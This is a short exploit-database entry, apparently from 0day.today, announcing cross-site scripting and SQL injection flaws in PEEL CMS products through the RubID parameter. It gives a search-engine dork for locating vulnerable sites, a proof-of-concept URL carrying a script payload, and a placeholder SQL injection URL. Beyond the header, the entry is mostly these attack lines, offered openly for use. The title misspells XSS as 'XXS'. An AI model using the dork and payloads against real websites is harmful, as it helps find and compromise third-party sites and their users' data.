id: 13604
date: 08/07/2010
title: PEEL CMS (rubID?) XXS/SQL Injection Vulnerability
author: poni
cves: 

=================================================
PEEL CMS (rubID?) XXS/SQL Injection Vulnerability
=================================================

  __ __ __ __
  \ \/ / CODE \ \/ /
   > < \ /
  /_/\_\ /_/ OGYAFREE
  Http://forum.xcode.or.id
  Be Free To Join Us For A Better Digital World
      Discovered by : poni & Darkzz
  Site : forum.xcode.or.id

################################################################################################
# Products : PACK SERENITE, PEEL PREMIUM #
# Dork : inurl:"rubID=" #
# Vendor : http://www.peel.fr #
# Exploit : http://www.site.com/index.php?RubID="<script>alert("XXS bug Found";) </script> #
# http://www.site.com/index.php?RubID=[SQL Injection] #
################################################################################################



#  0day.today [2023-03-22]  #